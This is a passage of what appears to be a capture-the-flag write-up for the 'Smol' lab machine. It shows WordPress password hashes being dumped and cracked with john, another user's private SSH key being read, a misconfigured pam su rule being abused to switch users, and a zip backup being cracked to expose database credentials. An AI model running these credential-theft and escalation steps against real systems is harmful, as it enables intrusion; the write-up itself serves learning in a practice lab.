databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| mysql              |\n| performance_schema |\n| sys                |\n| wordpress          |\n+--------------------+\n5 rows in set (0.00 sec)\n\nmysql&gt; use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; select * from wp_users;\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n| ID | user_login | user_pass                                                       | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           
|\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              | admin         | admin@smol.thm     | http:\/\/www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |\n|  2 | wpuser     | $wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m | wp            | wp@smol.thm        | http:\/\/smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |\n|  3 | think      | $P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/                              | think         | josemlwdf@smol.thm | http:\/\/smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |\n|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1                              | gege          | gege@smol.thm      | http:\/\/smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |\n|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              | diego         | diego@smol.thm     | http:\/\/smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |\n|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN\/                              | xavi          | xavi@smol.thm      | http:\/\/smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |\n+----+------------+-----------------------------------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+\n6 rows in set (0.00 sec)\n\nmysql&gt; select user_nicename,user_login,user_pass from 
wp_users;\n+---------------+------------+-----------------------------------------------------------------+\n| user_nicename | user_login | user_pass                                                       |\n+---------------+------------+-----------------------------------------------------------------+\n| admin         | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0                              |\n| wp            | wpuser     | $wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m |\n| think         | think      | $P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/                              |\n| gege          | gege       | $P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1                              |\n| diego         | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1                              |\n| xavi          | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN\/                              |\n+---------------+------------+-----------------------------------------------------------------+\n6 rows in set (0.00 sec)<\/code><\/pre>\n<p>Try to crack them:<\/p>\n<pre><code class=\"language-bash\">admin:$P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0\nwpuser:$wp$2y$10$r\/uM4j6A55cItdSTTE85dOrI.ON1XwmeHoQ7q1WFr953ibBCm0I9m\nthink:$P$B0jO\/cdGOCZhlAJfPSqV2gVi2pb7Vd\/\ngege:$P$BsIY1w5krnhP3WvURMts0\/M4FwiG0m1\ndiego:$P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1\nxavi:$P$BvcalhsCfVILp2SgttADny40mqJZCN\/<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash     \nUsing default input encoding: UTF-8\nLoaded 5 password hashes with 5 different salts (phpass [phpass ($P$ or $H$) 128\/128 SSE2 4x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nsandiegocalifornia (diego)     \n1g 0:00:43:32 42.46% (ETA: 04:19:56) 0.000382g\/s 2372p\/s 9992c\/s 9992C\/s 
lilmami503..lilmama_c\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession aborted<\/code><\/pre>\n<p>Cracking yields the password: <code>diego:sandiegocalifornia <\/code>. The ssh service is running, but login is not allowed....<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550981.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550981.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607144723756\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Reading credentials through shared group permissions to switch users<\/h3>\n<pre><code class=\"language-bash\">diego@smol:~$ ls -la\ntotal 24\ndrwxr-x--- 2 diego internal 4096 Aug 18  2023 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 diego diego     220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 diego diego    3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 diego diego     807 Feb 25  2020 .profile\n-rw-r--r-- 1 root  root       33 Aug 16  2023 user.txt\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -&gt; \/dev\/null\ndiego@smol:~$ cat user.txt \n45edaec653ff9ee06236b7ce72b86963\ndiego@smol:~$ sudo -l\n[sudo] password for diego: \nSorry, user diego may not run sudo on smol.\ndiego@smol:~$ whoami;id\ndiego\nuid=1002(diego) 
gid=1002(diego) groups=1002(diego),1005(internal)\ndiego@smol:~$ ls -la ..\/\ntotal 24\ndrwxr-xr-x  6 root  root     4096 Aug 16  2023 .\ndrwxr-xr-x 18 root  root     4096 Mar 29  2024 ..\ndrwxr-x---  2 diego internal 4096 Aug 18  2023 diego\ndrwxr-x---  2 gege  internal 4096 Aug 18  2023 gege\ndrwxr-x---  5 think internal 4096 Jan 12  2024 think\ndrwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi<\/code><\/pre>\n<p>Earlier I noticed four users sharing the same group permissions; check whether there is anything useful:<\/p>\n<pre><code class=\"language-bash\">diego@smol:~$ cd ..\/gege\ndiego@smol:\/home\/gege$ ls -la\ntotal 31532\ndrwxr-x--- 2 gege internal     4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root         4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -&gt; \/dev\/null\n-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip\ndiego@smol:\/home\/gege$ cd ..\/think\ndiego@smol:\/home\/think$ ls -la\ntotal 32\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout\n-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc\ndrwx------ 2 think think    4096 Jan 12  2024 .cache\ndrwx------ 3 think think    4096 Aug 18  2023 .gnupg\n-rw-r--r-- 1 think think     807 Jun  2  2023 .profile\ndrwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -&gt; \/dev\/null\ndiego@smol:\/home\/think$ cd .ssh\ndiego@smol:\/home\/think\/.ssh$ ls -la\ntotal 20\ndrwxr-xr-x 2 think think   
 4096 Jun 21  2023 .\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 ..\n-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys\n-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa\n-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub\ndiego@smol:\/home\/think\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAxGtoQjY5NUymuD+3b0xzEYIhdBbsnicrrnvkMjOgdbp8xYKrfOgM\nehrkrEXjcqmrFvZzp0hnVnbaCyUV8vDrywsrEivK7d5IDefssH\/RqRinOY3FEYE+ekzKoH\n+S6+jNEKedMH7DamLsXxsAG5b\/Avm+FpWmvN1yS5sTeCeYU0wsHMP+cfM1cYcDkDU6HmiC\nA2G4D5+uPluSH13TS12JpFyU3EjHQvV6evERecriHSfV0PxMrrwJEyOwSPYA2c7RlYh+tb\nbniQRVAGE0Jato7kqAJOKZIuXHEIKhBnFOIt5J5sp6l\/QfXxZYRMBaiuyNttOY1byNwj6\/\nEEyQe1YM5chhtmJm\/RWog8U6DZf8BgB2KoVN7k11VG74+cmFMbGP6xn1mQG6i2u3H6WcY1\nLAc0J1bhypGsPPcE06934s9jrKiN9Xk9BG7HCnDhY2A6bC6biE4UqfU3ikNQZMXwCvF8vY\nHD4zdOgaUM8Pqi90WCGEcGPtTfW\/dPe4+XoqZmcVAAAFiK47j+auO4\/mAAAAB3NzaC1yc2\nEAAAGBAMRraEI2OTVMprg\/t29McxGCIXQW7J4nK6575DIzoHW6fMWCq3zoDHoa5KxF43Kp\nqxb2c6dIZ1Z22gslFfLw68sLKxIryu3eSA3n7LB\/0akYpzmNxRGBPnpMyqB\/kuvozRCnnT\nB+w2pi7F8bABuW\/wL5vhaVprzdckubE3gnmFNMLBzD\/nHzNXGHA5A1Oh5oggNhuA+frj5b\nkh9d00tdiaRclNxIx0L1enrxEXnK4h0n1dD8TK68CRMjsEj2ANnO0ZWIfrW254kEVQBhNC\nWraO5KgCTimSLlxxCCoQZxTiLeSebKepf0H18WWETAWorsjbbTmNW8jcI+vxBMkHtWDOXI\nYbZiZv0VqIPFOg2X\/AYAdiqFTe5NdVRu+PnJhTGxj+sZ9ZkBuotrtx+lnGNSwHNCdW4cqR\nrDz3BNOvd+LPY6yojfV5PQRuxwpw4WNgOmwum4hOFKn1N4pDUGTF8ArxfL2Bw+M3ToGlDP\nD6ovdFghhHBj7U31v3T3uPl6KmZnFQAAAAMBAAEAAAGBAIxuXnQ4YF6DFw\/UPkoM1phF+b\nUOTs4kI070tQpPbwG8+0gbTJBZN9J1N9kTfrKULAaW3clUMs3W273sHe074tmgeoLbXJME\nwW9vygHG4ReM0MKNYcBKL2kxTg3CKEESiMrHi9MITp7ZazX0D\/ep1VlDRWzQQg32Jal4jk\nrxxC6J32ARoPHHeQZaCWopJAxpm8rfKsHA4MsknSxf4JmZnrcsmiGExzJQX+lWQbBaJZ\/C\nw1RPjmO\/fJ16fqcreyA+hMeAS0Vd6rUqRkZcY\/0\/aA3zGUgXaaeiKtscjKJqeXZ66\/NiYD\n6XhW\/O3\/uBwepTV\/ckwzdDYD3v23YuJp1wUOPG\/7iTYdQXP1FSHYQMd\/C+37gyURlZJqZg\ne8ShcdgU4htakbSA8K2pYwaSnpxsp\/LHk9adQi4bB0i8bCTX8HQqzU8zgaO9ew
jLpGBwf4\nY0qNNo8wyTluGrKf72vDbajti9RwuO5wXhdi+RNhktuv6B4aGLTmDpNUk5UALknD2qAQAA\nAMBU+E8sqbf2oVmb6tyPu6Pw\/Srpk5caQw8Dn5RvG8VcdPsdCSc29Z+frcDkWN2OqL+b0B\nzbOhGp\/YwPhJi098nujXEpSied8JCKO0R9wU\/luWKeorvIQlpaKA5TDZaztrFqBkE8FFEQ\ngKLOtX3EX2P11ZB9UX\/nD9c30jEW7NrVcrC0qmts4HSpr1rggIm+JIom8xJQWuVK42Dmun\nlJqND0YfSgN5pqY4hNeqWIz2EnrFxfMaSzUFacK8WLQXVP2x8AAADBAPkcG1ZU4dRIwlXE\nXX060DsJ9omNYPHOXVlPmOov7Ull6TOdv1kaUuCszf2dhl1A\/BBkGPQDP5hKrOdrh8vcRR\nA+Eog\/y0lw6CDUDfwGQrqDKRxVVUcNbGNhjgnxRRg2ODEOK9G8GsJuRYihTZp0LniM2fHd\njAoSAEuXfS7+8zGZ9k9VDL8jaNNM+BX+DZPJs2FxO5MHu7SO\/yU9wKf\/zsuu5KlkYGFgLV\nIfa4X2anF1HTJJVfYWUBWAPPsKSfX1UQAAAMEAydo2UnBQhJUia3ux2LgTDe4FMldwZ+yy\nPiFf+EnK994HuAkW2l3R36PN+BoOua7g1g1GHveMfB\/nHh4zEB7rhYLFuDyZ\/\/8IzuTaTN\n7kGcF7yOYCd7oRmTQLUZeGz7WBr3ydmCPPLDJe7Tj94roX8tgwMO5WCuWHym6Os8z0NKKR\nu742mQ\/UfeT6NnCJWHTorNpJO1fOexq1kmFKCMncIINnk8ZF1BBRQZtfjMvJ44sj9Oi4aE\n81DXo7MfGm0bSFAAAAEnRoaW5rQHVidW50dXNlcnZlcg==\n-----END OPENSSH PRIVATE KEY-----\ndiego@smol:\/home\/think\/.ssh$ cat authorized_keys \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw\/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ\/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl\/wGAHYqhU3uTXVUbvj5yYUxsY\/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver\ndiego@smol:\/home\/think\/.ssh$ cat id_rsa.pub \nssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABgQDEa2hCNjk1TKa4P7dvTHMRgiF0FuyeJyuue+QyM6B1unzFgqt86Ax6GuSsReNyqasW9nOnSGdWdtoLJRXy8OvLCysSK8rt3kgN5+ywf9GpGKc5jcURgT56TMqgf5Lr6M0Qp50wfsNqYuxfGwAblv8C+b4Wlaa83XJLmxN4J5hTTCwcw\/5x8zVxhwOQNToeaIIDYbgPn64+W5IfXdNLXYmkXJTcSMdC9Xp68RF5yuIdJ9XQ\/EyuvAkTI7BI9gDZztGViH61tueJBFUAYTQlq2juSoAk4pki5ccQgqEGcU4i3knmynqX9B9fFlhEwFqK7I2205jVvI3CPr8QTJB7VgzlyGG2Ymb9FaiDxToNl\/wGAHYqhU3uTXVUbvj5yYUxsY\/rGfWZAbqLa7cfpZxjUsBzQnVuHKkaw89wTTr3fiz2OsqI31eT0EbscKcOFjYDpsLpuIThSp9TeKQ1BkxfAK8Xy9gcPjN06BpQzw+qL3RYIYRwY+1N9b9097j5eipmZxU= think@ubuntuserver\ndiego@smol:\/home\/think\/.ssh$ cd ..\/..\/xavi\/\ndiego@smol:\/home\/xavi$ ls -la\ntotal 20\ndrwxr-x--- 2 xavi internal 4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root        9 Aug 18  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 xavi xavi      220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 xavi xavi     3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 xavi xavi      807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root        9 Aug 18  2023 .viminfo -&gt; \/dev\/null<\/code><\/pre>\n<p>Found a backup and a user that can be logged in to with SSH credentials, so log in first:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550982.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550982.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20250607145414287\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h3>Passwordless switching via the su configuration file<\/h3>\n<p>Information gathering turned up:<\/p>\n<pre><code class=\"language-bash\">think@smol:~$ ls -la\ntotal 32\ndrwxr-x--- 5 think internal 4096 Jan 12  2024 .\ndrwxr-xr-x 6 root  root     4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout\n-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc\ndrwx------ 2 think think    4096 Jan 12  2024 .cache\ndrwx------ 3 think think    4096 Aug 18  2023 .gnupg\n-rw-r--r-- 1 think think     807 Jun  2  2023 .profile\ndrwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh\nlrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -&gt; \/dev\/null\nthink@smol:~$ whoami;id\nthink\nuid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)\nthink@smol:~$ cat \/etc\/group | grep dev\nplugdev:x:46:\ndev:x:1004:think,gege\nthink@smol:~$ cd ..\/gege\nthink@smol:\/home\/gege$ ls -la\ntotal 31532\ndrwxr-x--- 2 gege internal     4096 Aug 18  2023 .\ndrwxr-xr-x 6 root root         4096 Aug 16  2023 ..\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc\n-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -&gt; \/dev\/null\n-rwxr-x--- 1 root gege     32266546 Aug 16  2023 
wordpress.old.zip<\/code><\/pre>\n<p>The <code>think<\/code> and <code>gege<\/code> users fall within the same group permission scope, so the idea here is probably to move from <code>think<\/code> over to <code>gege<\/code>, but I had no real leads. I uploaded <code>linpeas.sh<\/code> to scan... but it turned up nothing big. After reading some other players' writeups, I found that you can simply switch user here; it looks like a configuration file was modified, so take a look:<\/p>\n<pre><code class=\"language-bash\">think@smol:\/tmp$ cat \/etc\/pam.d\/su | grep auth\nauth       sufficient pam_rootok.so\nauth  [success=ignore default=1] pam_succeed_if.so user = gege\nauth  sufficient                 pam_succeed_if.so use_uid user = think\n# auth       required   pam_wheel.so\n# auth       sufficient pam_wheel.so trust\n# auth       required   pam_wheel.so deny group=nosu\n# The standard Unix authentication modules, used with\n@include common-auth<\/code><\/pre>\n<p>This means <code>think<\/code> is a trusted user: when the target user is <code>gege<\/code>, the next rule is evaluated, and it is <code>sufficient<\/code> if the calling user (<code>use_uid<\/code>) is <code>think<\/code>, so no password is asked for. Switch:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550983.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506071550983.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250607151547211\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h3>Cracking the backup file<\/h3>\n<p>I transferred the file to my local machine to see what had been backed up, but extracting it turned out to require a password.... Try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ zip2john wordpress.old.zip &gt; ziphash\n-----------\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ sudo john --wordlist=\/usr\/share\/wordlists\/rockyou.txt ziphash\n[sudo] password for kali: \nUsing default input encoding: UTF-8\nLoaded 1 password hash (PKZIP [32\/64])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nhero_gege@hotmail.com (wordpress.old.zip)     \n1g 0:00:00:01 DONE (2025-06-07 03:22) 0.5649g\/s 4306Kp\/s 4306Kc\/s 4306KC\/s hesse..hermosa_jessy\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<p>With the password known, the archive can be extracted:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ ll\ntotal 31544\n-rw-r--r-- 1 kali kali     4571 Jun  6 22:13 cms.log\n-rw-rw-r-- 1 kali kali      274 Jun  7 02:37 hash\n-rw------- 1 kali kali     2602 Jun  7 02:52 id_rsa\n-rw-r--r-- 1 kali kali      517 Jun  6 22:13 reports.json\ndrwxr-xr-x 4 kali kali     4096 Jun  6 22:06 Result\n-rw-rw-r-- 1 kali kali       50 Jun  7 01:17 revshell.sh\n-rw-rw-r-- 1 kali kali 32266546 Aug 16  2023 wordpress.old.zip\n-rw-rw-r-- 1 kali kali     1192 Jun  7 03:19 
ziphash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ unzip wordpress.old.zip\nArchive:  wordpress.old.zip\n   creating: wordpress.old\/\n[wordpress.old.zip] wordpress.old\/wp-config.php password: \n  inflating: wordpress.old\/wp-config.php  \n  inflating: wordpress.old\/index.php  \n  inflating: wordpress.old\/wp-comments-post.php  \n  inflating: wordpress.old\/xmlrpc.php  \n  inflating: wordpress.old\/license.txt  \n  inflating: wordpress.old\/wp-login.php  \n   creating: wordpress.old\/wp-content\/\n extracting: wordpress.old\/wp-content\/index.php  \n   creating: wordpress.old\/wp-content\/plugins\/\n   ----------------\n  inflating: wordpress.old\/wp-admin\/export.php  \n  inflating: wordpress.old\/wp-admin\/options-writing.php  \n  inflating: wordpress.old\/wp-admin\/users.php  \n  inflating: wordpress.old\/wp-admin\/options-media.php  \n  inflating: wordpress.old\/wp-admin\/edit.php  \n  inflating: wordpress.old\/wp-admin\/import.php  \n  inflating: wordpress.old\/wp-admin\/revision.php<\/code><\/pre>\n<p>Searching through the extracted files turns up a fairly sensitive configuration file:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol]\n\u2514\u2500$ cd wordpress.old \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ ll\ntotal 228\n-rw-r--r--  1 kali kali   405 Aug 16  2023 index.php\n-rw-r--r--  1 kali kali 19915 Aug 16  2023 license.txt\n-rw-r--r--  1 kali kali  7399 Aug 16  2023 readme.html\n-rw-r--r--  1 kali kali  7211 Aug 16  2023 wp-activate.php\ndrwxr-xr-x  9 kali kali  4096 Aug 16  2023 wp-admin\n-rw-r--r--  1 kali kali   351 Aug 16  2023 wp-blog-header.php\n-rw-r--r--  1 kali kali  2323 Aug 16  2023 wp-comments-post.php\n-rw-r--r--  1 kali kali  2994 Aug 16  2023 wp-config.php\ndrwxr-xr-x  7 kali kali  4096 Aug 16  2023 wp-content\n-rw-r--r--  1 kali kali  5638 Aug 16  2023 wp-cron.php\ndrwxr-xr-x 27 kali kali 12288 Aug 
16  2023 wp-includes\n-rw-r--r--  1 kali kali  2502 Aug 16  2023 wp-links-opml.php\n-rw-r--r--  1 kali kali  3927 Aug 16  2023 wp-load.php\n-rw-r--r--  1 kali kali 49441 Aug 16  2023 wp-login.php\n-rw-r--r--  1 kali kali  8537 Aug 16  2023 wp-mail.php\n-rw-r--r--  1 kali kali 25602 Aug 16  2023 wp-settings.php\n-rw-r--r--  1 kali kali 34385 Aug 16  2023 wp-signup.php\n-rw-r--r--  1 kali kali  4885 Aug 16  2023 wp-trackback.php\n-rw-r--r--  1 kali kali  3236 Aug 16  2023 xmlrpc.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Smol\/wordpress.old]\n\u2514\u2500$ cat wp-config.php \n&lt;?php\n\/**\n * The base configuration for WordPress\n *\n * The wp-config.php creation script uses this file during the installation.\n * You don&#039;t have to use the web site, you can copy this file to &quot;wp-config.php&quot;\n * and fill in the values.\n *\n * This file contains the following configurations:\n *\n * * Database settings\n * * Secret keys\n * * Database table prefix\n * * ABSPATH\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/editing-wp-config-php\/\n *\n * @package WordPress\n *\/\n\n\/\/ ** Database settings - You can get this info from your web host ** \/\/\n\/** The name of the database for WordPress *\/\ndefine( &#039;DB_NAME&#039;, &#039;wordpress&#039; );\n\n\/** Database username *\/\ndefine( &#039;DB_USER&#039;, &#039;xavi&#039; );\n\n\/** Database password *\/\ndefine( &#039;DB_PASSWORD&#039;, &#039;P@ssw0rdxavi@&#039; );\n\n\/** Database hostname *\/\ndefine( &#039;DB_HOST&#039;, &#039;localhost&#039; );\n\n\/** Database charset to use in creating database tables. *\/\ndefine( &#039;DB_CHARSET&#039;, &#039;utf8&#039; );\n\n\/** The database collate type. Don&#039;t change this if in doubt. *\/\ndefine( &#039;DB_COLLATE&#039;, &#039;&#039; );\n\n\/**#@+\n * Authentication unique keys and salts.\n *\n * Change these to different unique phrases! 
You can generate these using\n * the {@link https:\/\/api.wordpress.org\/secret-key\/1.1\/salt\/ WordPress.org secret-key service}.\n *\n * You can change these at any point in time to invalidate all existing cookies.\n * This will force all users to have to log in again.\n *\n * @since 2.6.0\n *\/\ndefine( &#039;AUTH_KEY&#039;,         &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_KEY&#039;,  &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_KEY&#039;,    &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_KEY&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;AUTH_SALT&#039;,        &#039;put your unique phrase here&#039; );\ndefine( &#039;SECURE_AUTH_SALT&#039;, &#039;put your unique phrase here&#039; );\ndefine( &#039;LOGGED_IN_SALT&#039;,   &#039;put your unique phrase here&#039; );\ndefine( &#039;NONCE_SALT&#039;,       &#039;put your unique phrase here&#039; );\n\n\/**#@-*\/\n\n\/**\n * WordPress database table prefix.\n *\n * You can have multiple installations in one database if you give each\n * a unique prefix. Only numbers, letters, and underscores please!\n *\/\n$table_prefix = &#039;wp_&#039;;\n\n\/**\n * For developers: WordPress debugging mode.\n *\n * Change this to true to enable the display of notices during development.\n * It is strongly recommended that plugin and theme developers use WP_DEBUG\n * in their development environments.\n *\n * For information on other constants that can be used for debugging,\n * visit the documentation.\n *\n * @link https:\/\/wordpress.org\/documentation\/article\/debugging-in-wordpress\/\n *\/\ndefine( &#039;WP_DEBUG&#039;, true );\n\n\/* Add any custom values between this line and the &quot;stop editing&quot; line. *\/\n\n\/* That&#039;s all, stop editing! Happy publishing. *\/\n\n\/** Absolute path to the WordPress directory. *\/\nif ( 